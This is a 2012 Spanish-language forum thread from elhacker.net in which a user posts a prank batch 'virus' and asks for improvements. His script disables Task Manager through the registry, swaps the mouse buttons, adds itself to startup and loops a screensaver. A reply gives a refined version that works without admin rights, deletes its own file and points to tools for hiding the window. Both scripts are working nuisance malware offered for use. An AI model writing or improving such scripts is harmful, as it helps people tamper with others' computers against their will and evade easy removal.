Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: noobeh en 2 Octubre 2012, 20:50 pm



Título: virusillo batch
Publicado por: noobeh en 2 Octubre 2012, 20:50 pm
Buenas, hoy me aburria un poco en clase y me he puesto a hacer un bat que si más no, es un poco molesto :P

Os cuelgo el código
Código
  1. @echo off
  2. copy virus.bat "C:\WINDOWS\system32\virus.bat"
  3. REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  4. RUNDLL32.EXE user32.dll,SwapMouseButton
  5. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "Salvapantallas" /t REG_SZ /d "C:\WINDOWS\system32\virus.bat"
  6.  
  7.  
  8.  
  9.  
  10. :loop
  11. ssbezier.scr /S /Q /R
  12. goto loop
  13.  
Se que hay muchas cosas que estan bastante mal, me gustaria que me diéseis vuestra opinion y si podeis arreglar o aportar algo seria genial xD

Basicamente lo que hace es copiarse a system 32, deshabilita el administrador de tareas, invierte los botones del mouse (el derecho pasa a ser el izquierdo y viceversa) y se añade al Run, para que se ejecute al iniciar el ordenador. Luego lo único que hace es llamar constantemente a un salvapantallas. Me gustaria saber si habria alguna forma de poder ejecutarlo en segundo plano, ya que si se abre la ventana del cmd es relativamente facil cerrarlo (aun y que el boton del mouse cambia de lado y es bastante confuso) y el salvapantallas acaba dando dolor de cabeza, al borde de un ataque de epilepsia jaja.

En fin a ver si hay algun crack por ahi que consiga alguna solución, y espero que os guste.


Título: Re: virusillo batch
Publicado por: Eleкtro en 2 Octubre 2012, 21:36 pm
Hola,

El salvapantallas no existe en Windows 7

¿Que pasa si mi archivo se llama "bicho.bat" en vez de "virus.bat"?  :silbar:
http://ss64.com/nt/syntax-args.html

Has elegido un mal sitio para copiarse a si mismo, elige otro menos restrictivo... no todos tienen permisos para usar las carpeta del sistema.
Ni tampoco todos tienen permiso de admin para agregar claves a la raíz local (HKLM).

Tampoco hay necesidad de autocopiarse.
Código
  1. @Echo OFF
  2. REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T REG_DWORD /D "1" /F >NUL
  3. REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Salvapantallas" /D "CMD /C \"Start /B RUNDLL32.EXE user32.dll,SwapMouseButton ^& (FOR /L %%# in (1,1,9999) DO (ssbezier.scr /S /Q /R))\"" /F >NUL
  4. Del /Q %0

Para ocultarlo usa un script VBS o un "compilador" de batch, usa el buscador del foro, que se ha hablado 1.000 veces y la información la tienes delante.

Saludos





[offtopic]
edito: ups me equivoqué al comentar la función swapmouse de rundll32... ¿cual era esa función que en win7 desapareció? :-/
[(offtopic]